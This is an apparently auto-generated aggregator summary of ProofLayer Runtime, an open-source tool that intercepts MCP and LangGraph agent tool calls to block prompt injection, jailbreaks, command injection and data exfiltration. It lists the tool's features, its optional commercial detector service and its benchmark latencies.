ProofLayer brings open-source runtime security to MCP servers and LangGraph agents
ProofLayer Runtime is an open-source security layer that intercepts tool calls and agent executions to detect and block prompt injection, jailbreaks, command injection, and data exfiltration in MCP servers and LangGraph agents.
Score breakdown
ProofLayer Runtime provides an open-source, low-latency interception layer that enforces security rules directly on the tool-call path of MCP servers and LangGraph agents, filling a gap where no such runtime guard previously existed in the open-source ecosystem for these frameworks.
- 01Open-source runtime security rules engine for MCP servers and LangGraph agents, published by sinewaveai under the Apache-2.0 license.
- 02Sits on the tool-call or agent-execution path and can warn, block, or stop dangerous actions before they reach the underlying server or output stream.
- 03Detects prompt injection, command injection, jailbreaks, and data exfiltration.
ProofLayer Runtime, published by sinewaveai on GitHub under the Apache-2.0 license, is an open-source runtime security layer designed to protect MCP servers and LangGraph agents from a range of adversarial threats. It intercepts requests on the tool-call or agent-execution path, applies local rules to scan for prompt injection, command injection, jailbreaks, and data exfiltration, and can warn, block, or halt dangerous actions before they reach the underlying server, tool, state update, or output stream.
The system operates in a self-contained rules-only mode by default.
The system operates in a self-contained rules-only mode by default. For ambiguous events that local rules cannot confidently classify, it can optionally call the `prooflayer-detector` service via `/v1/detect` for model-backed scoring — a capability described as a separate commercial offering. The repository includes local MCP runtime wrappers for both synchronous and MCP Python SDK servers, an HTTP proxy transport for JSON-RPC `tools/call` traffic, and a LangGraph runtime wrapper that covers prompt injection, jailbreak, tool abuse, exfiltration, scope drift, state manipulation, multi-turn, and streaming checks. Adversarial evaluation support is provided through a built-in suite as well as integrations with GARAK and PromptFoo. Reported benchmark latencies are p99 6.23 ms on the rules layer and p99 32.72 ms on a secured LangGraph invocation, both described as falling within a 100 ms sprint budget.
Key facts
- 01Open-source runtime security rules engine for MCP servers and LangGraph agents, published by sinewaveai under the Apache-2.0 license.
- 02Sits on the tool-call or agent-execution path and can warn, block, or stop dangerous actions before they reach the underlying server or output stream.
- 03Detects prompt injection, command injection, jailbreaks, and data exfiltration.
- 04Operates standalone in rules-only mode; optionally calls the commercial `prooflayer-detector` service via `/v1/detect` for model-backed scoring.
- 05Hot-path latency: p99 6.23 ms on the rules layer and p99 32.72 ms on a secured LangGraph invocation benchmark.
- 06Includes adversarial evals for LangGraph agents via a built-in suite, GARAK, and PromptFoo.
- 07LangGraph runtime wrapper covers prompt injection, jailbreak, tool abuse, exfiltration, scope drift, state manipulation, multi-turn, and streaming checks.
Topics
Summary and scoring are generated automatically from the original article. We always link back to the publisher and never republish images or paywalled content. Last processed Jun 13, 2026 · 08:58 UTC. How this works →